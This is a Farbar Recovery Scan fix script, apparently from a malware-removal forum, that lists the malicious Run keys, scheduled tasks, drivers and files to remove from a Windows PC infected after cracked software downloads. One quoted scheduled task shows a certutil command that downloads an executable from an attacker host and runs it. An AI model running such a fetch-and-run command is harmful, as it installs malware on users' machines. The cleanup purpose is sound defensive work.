start:: closeprocesses: createrestorepoint: ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Hugo Animey\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Hugo Animey\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Hugo Animey\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Hugo Animey\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Hugo Animey\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Hugo Animey\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Hugo Animey\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Hugo Animey\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Hugo Animey\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Hugo Animey\AppData\Local\MEGAsync\ShellExtX64.dll -> Pas de fichier ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Pas de fichier ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => -> Pas de fichier C:\Windows\windefender.exe C:\WINDOWS\edwflpipspjzqe.edw AlternateDataStreams: C:\Users\Public\AppData:CSM [478] AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [472] HKU\S-1-5-21-972435639-1527979506-549466916-1001\Software\Classes\regfile: regedit.exe "%1" <==== ATTENTION virustotal: C:\Program Files (x86)\Equivocate\blackhead.exe C:\Users\Hugo Animey\AppData\Local\Doot.exe C:\Program Files (x86)\Glycol C:\Program Files (x86)\bt C:\Program Files (x86)\Ruocco C:\Windows\rss C:\Program Files\Homeville HKLM-x32\...\Run: [Demonstrate] => "C:\Program Files (x86)\Glycol\Doot.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKLM-x32\...\Run: [Premonitory] => "C:\Program Files (x86)\bt\Securitized.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKLM-x32\...\Run: [Spend] => "C:\Program Files (x86)\Ruocco\Doot.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKLM\...\Run: [Infantry] => "C:\Program Files (x86)\Glycol\Doot.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKLM\...\Run: [Parodied] => "C:\Program Files (x86)\bt\Securitized.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKLM\...\Run: [Syd] => "C:\Program Files (x86)\Ruocco\Doot.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [BitTorrent] => C:\Users\Hugo Animey\AppData\Roaming\BitTorrent\BitTorrent.exe [1744064 2019-02-05] (BitTorrent Inc -> BitTorrent Inc.) HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [CTCV.exe] => C:\Users\Hugo Animey\AppData\Local\Temp\1PGICE31P1\CTCV.exe [306688 2019-05-21] () [Fichier non signé] <==== ATTENTION HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [Koury] => "C:\Program Files (x86)\Glycol\Doot.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [Rooker] => "C:\Program Files (x86)\bt\Securitized.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [Dering] => "C:\Program Files (x86)\Ruocco\Doot.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [Unforeseeable] => "C:\Program Files (x86)\Glycol\Doot.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [Liaising] => "C:\Program Files (x86)\bt\Securitized.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [Skokie] => "C:\Program Files (x86)\Ruocco\Doot.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [gumball] => C:\Program Files (x86)\lak\gumball.exe [51566 2019-05-21] () [Fichier non signé] HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [canapes] => "C:\Program Files (x86)\Glycol\Doot.exe" haanmmwhaanmmwhaanmmwhaanmm.haanmmghaanmmbhaanmmhhaanmm.haanmmphaanmmwhaanmm/haanmmlu2k0k1k9khaanmm0la5la2lu1haanmmlukhtmlMCNhaanmmsJOJGyD3HYhaanmm3fRQBd4 HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [DelicatePaper] => C:\WINDOWS\rss\csrss.exe [6384128 2019-05-21] () [Fichier non signé] <==== ATTENTION HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [CSG3.exe] => C:\Users\Hugo Animey\AppData\Local\Temp\Q9T1H4R39O\CSG3.exe [306688 2019-05-21] () [Fichier non signé] <==== ATTENTION HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [ES9T.exe] => C:\Users\Hugo Animey\AppData\Local\Temp\TSRL12JHGF\ES9T.exe [306688 2019-05-21] () [Fichier non signé] <==== ATTENTION HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [1H9B.exe] => C:\Users\Hugo Animey\AppData\Local\Temp\7VXMAXQJX7\1H9B.exe [306688 2019-05-21] () [Fichier non signé] <==== ATTENTION HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [ROSO.exe] => C:\Users\Hugo Animey\AppData\Local\Temp\B62P5WDOLV\ROSO.exe [306688 2019-05-21] () [Fichier non signé] <==== ATTENTION HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [22588760 2019-05-09] (Piriform Software Ltd -> Piriform Software Ltd) HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\Run: [CloudNet] => C:\Users\Hugo Animey\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-05-21] (EpicNet Inc.) [Fichier non signé] <==== ATTENTION HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\MountPoints2: {003f92b3-ae9d-11e7-9bc2-806e6f6e6963} - "E:\INSTALL.EXE" id=10000013000015000007 ver=1.0.0.0 HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\MountPoints2: {449b3f78-f4f4-11e8-9cca-107b4416be73} - "I:\HiSuiteDownLoader.exe" HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\MountPoints2: {47fc6455-ba62-11e7-9bcd-72c27bc2ac62} - "F:\setup.exe" HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\MountPoints2: {b8a8b1bb-9670-11e8-9c82-107b4416be73} - "H:\HiSuiteDownLoader.exe" HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\MountPoints2: {e746ff39-40b3-11e9-9d12-107b4416be73} - "I:\HiSuiteDownLoader.exe" HKU\S-1-5-21-972435639-1527979506-549466916-1001\...\MountPoints2: {f1833667-2c70-11e8-9c0e-107b4416be73} - "H:\iStudio.exe" Startup: C:\Users\Hugo Animey\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\allure.lnk [2019-05-21] ShortcutTarget: allure.lnk -> C:\Program Files (x86)\Glycol\Doot.exe (Pas de fichier) Startup: C:\Users\Hugo Animey\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\allureallure.lnk [2019-05-21] ShortcutTarget: allureallure.lnk -> C:\Program Files (x86)\bt\Securitized.exe (Pas de fichier) GroupPolicy: Restriction ? <==== ATTENTION Task: {07057480-359E-4A2B-9821-074EC03D6689} - System32\Tasks\bernoullibernoulli => C:\Program Files (x86)\Glycol\Doot.exe Task: {507FBB41-47F2-4E91-B915-802609BF65D4} - System32\Tasks\accelerating-ansonaccelerating-anson => C:\Program Files (x86)\bt\Securitized.exe Task: {79FB2EE6-5C6B-492A-8156-68D3BA4A900F} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://seamonkey.club/app/app.exe C:\Users\Hugo Animey\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Hugo Animey\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: {7E876F51-38A1-4B01-A131-9055C4C52950} - System32\Tasks\costless meritt leathermancostless meritt leatherman => C:\Users\Hugo Animey\AppData\Local\Doot.exe [9728 2019-05-21] () [Fichier non signé] Task: {81C3FC80-EC17-41D6-B340-B81DDF28A19B} - System32\Tasks\liras_avantiliras_avanti => C:\Users\Hugo Animey\AppData\Local\Securitized.exe Task: {9C667060-6162-4173-B101-BF2CADB35A72} - System32\Tasks\denominated_disregarddenominated_disregard => C:\Program Files (x86)\Ruocco\Doot.exe Task: {B8459103-45D1-41E4-8D5E-33E38D5B7639} - System32\Tasks\broadhead schillerbroadhead schiller => C:\Program Files (x86)\Ruocco\Securitized.exe Task: {C905D7EF-0FDD-48C5-9FFF-88FFE72E7F91} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [6384128 2019-05-21] () [Fichier non signé] <==== ATTENTION Task: {EC2A49B2-468F-48F7-AE97-D0D563F046D8} - System32\Tasks\billbill => C:\Program Files (x86)\Equivocate\blackhead.exe [63492 2019-05-21] () [Fichier non signé] Task: {F33B2DD6-5EA1-4CE2-9D2D-5E6453D6D887} - System32\Tasks\Homeville => C:\Program Files\Homeville\Homeville.exe <==== ATTENTION Task: C:\Windows\Tasks\Homeville.job => C:\Program Files\Homeville\Homeville.exe <==== ATTENTION HKU\S-1-5-21-972435639-1527979506-549466916-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoH_F-zjl_VoQxUMz5MCjCMOQ2peh78EJ_5B5GpE4GjsJ3LoUv7KnVQ3Db3DAuqMr9DtVz6oHJtg_Emt2EDooYiCkYJGX8AlLhO7mw-P7w6_MZYc3N44UDuaGeL2X-fGIjUVw7x4T5RBKCEvuJD7zmGFkWFfLSUNo8beOzNBzripf&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope la valeur est absente CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx CHR Profile: C:\Users\Hugo Animey\AppData\Local\Google\Chrome\User Data\Guest Profile [2019-05-21] CHR Profile: C:\Users\Hugo Animey\AppData\Local\Google\Chrome\User Data\System Profile [2019-05-21] S2 OTA3OGQ5YTQ1ZD; C:\Program Files\OTA3OGQ5YTQ1ZD\ZWU3Y2E3Y2Y4MWY0MGQ.exe [604520 2019-05-20] (technologiejarbon.com -> ) <==== ATTENTION C:\Program Files\OTA3OGQ5YTQ1ZD R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Accès refusé) <==== ATTENTION (Accès refusé) C:\Windows\windefender.exe R1 ODhhYTI1ZGEzZ; C:\WINDOWS\system32\drivers\ODhhYTI1ZGEzZ [313560 2019-05-20] (technologiejarbon.com -> ) <==== ATTENTION C:\WINDOWS\system32\drivers\ODhhYTI1ZGEzZ R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier) C:\WINDOWS\System32\drivers\Winmon.sys R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier) R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2019-05-21] (WDKTestCert Admin,131666266076831434 -> ) [Fichier non signé] S3 WsAudioDevice_383; C:\Windows\system32\drivers\VirtualAudio.sys [39112 2017-10-11] (Wondershare Technology Co.,Ltd -> Wondershare) S3 BstkDrv; \??\C:\Program Files (x86)\BlueStacks\BstkDrv.sys [X] 2019-05-21 22:29 - 2019-05-21 22:29 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys 2019-05-21 21:59 - 2019-05-21 11:45 - 000009728 _____ C:\Users\Hugo Animey\AppData\Local\Doot.exe 2019-05-21 21:36 - 2019-05-21 22:29 - 000003294 _____ C:\Windows\System32\Tasks\csrss 2019-05-21 21:36 - 2019-05-21 21:39 - 000001558 _____ C:\Windows\Tasks\Homeville.job 2019-05-21 21:36 - 2019-05-21 21:37 - 009084432 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe 2019-05-21 21:36 - 2019-05-21 21:37 - 001260480 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe 2019-05-21 21:36 - 2019-05-21 21:36 - 000014008 _____ C:\Windows\System32\Tasks\Homeville 2019-05-21 21:36 - 2019-05-21 21:36 - 000004074 _____ C:\Windows\System32\Tasks\costless meritt leathermancostless meritt leatherman 2019-05-21 21:36 - 2019-05-21 21:36 - 000004046 _____ C:\Windows\System32\Tasks\broadhead schillerbroadhead schiller 2019-05-21 21:36 - 2019-05-21 21:36 - 000004044 _____ C:\Windows\System32\Tasks\denominated_disregarddenominated_disregard 2019-05-21 21:36 - 2019-05-21 21:36 - 000004038 _____ C:\Windows\System32\Tasks\accelerating-ansonaccelerating-anson 2019-05-21 21:36 - 2019-05-21 21:36 - 000004032 _____ C:\Windows\System32\Tasks\liras_avantiliras_avanti 2019-05-21 21:36 - 2019-05-21 21:36 - 000003996 _____ C:\Windows\System32\Tasks\bernoullibernoulli 2019-05-21 21:36 - 2019-05-21 21:36 - 000003994 _____ C:\Windows\System32\Tasks\billbill 2019-05-21 21:36 - 2019-05-21 21:36 - 000003984 _____ C:\Windows\System32\Tasks\sheddshedd 2019-05-21 21:36 - 2019-05-21 21:36 - 000000012 _____ C:\Windows\b57193834 2019-05-21 21:36 - 2019-05-21 21:36 - 000000000 ___HD C:\Program Files (x86)\lak 2019-05-21 19:34 - 2019-05-21 19:34 - 005260746 _____ C:\Users\Hugo Animey\Downloads\Cine Tracer-Cracked.zip 2019-05-21 19:34 - 2019-05-21 19:34 - 005260746 _____ C:\Users\Hugo Animey\Downloads\Cine Tracer-Cracked (1).zip 2019-05-21 19:35 - 2019-05-21 19:35 - 000000000 ____D C:\Users\Hugo Animey\AppData\Roaming\Cine Tracer Installer 2019-05-21 21:36 - 2019-05-21 21:36 - 000000000 ____D C:\ProgramData\{BCEC7337-6E0A-58F6-7273-75D472942C85} 2019-05-21 21:36 - 2019-05-21 21:36 - 000000000 ____D C:\ProgramData\{7D0FC719-DA24-9915-5CC7-96155C20CF44} 2019-05-21 21:36 - 2019-05-21 21:36 - 000000000 ____D C:\Program Files (x86)\lawmen 2019-05-21 21:36 - 2019-05-21 21:36 - 000000000 ____D C:\Program Files (x86)\foldershare 2019-05-21 21:36 - 2019-05-21 21:36 - 000000000 ____D C:\Program Files (x86)\Equivocate 2019-05-21 21:35 - 2019-05-21 21:35 - 002533376 _____ C:\Users\Hugo Animey\Downloads\TVPaint Animation 1108 Crack.iso 2019-05-21 21:35 - 2019-05-21 21:35 - 001027072 _____ C:\Windows\edwflpipspjzqe.edw 2019-05-21 21:35 - 2019-05-21 21:35 - 000000000 ____D C:\Program Files\OTA3OGQ5YTQ1ZD 2019-05-21 21:30 - 2019-05-21 21:30 - 000000000 ____D C:\Users\Hugo Animey\AppData\Roaming\tvp animation 10 pro 2019-05-21 21:29 - 2019-05-21 21:29 - 032892178 _____ (Friends in War) C:\Users\Hugo Animey\Downloads\TVPaint Animation 10 Pro v10.0.16.exe 2019-05-20 19:46 - 2019-05-20 19:46 - 001854976 _____ C:\Windows\MjQyOWI.exe 2019-05-20 19:46 - 2019-05-20 19:46 - 000313560 _____ C:\Windows\system32\Drivers\ODhhYTI1ZGEzZ virustotal: C:\Program Files (x86)\lawmen\lawmen.exe cmd: ipconfig /flusdns cmd: netsh advfirewall reset cmd: DISM /Online /Cleanup-image /Restorehealth cmd: sfc /scannow emptytemp: end::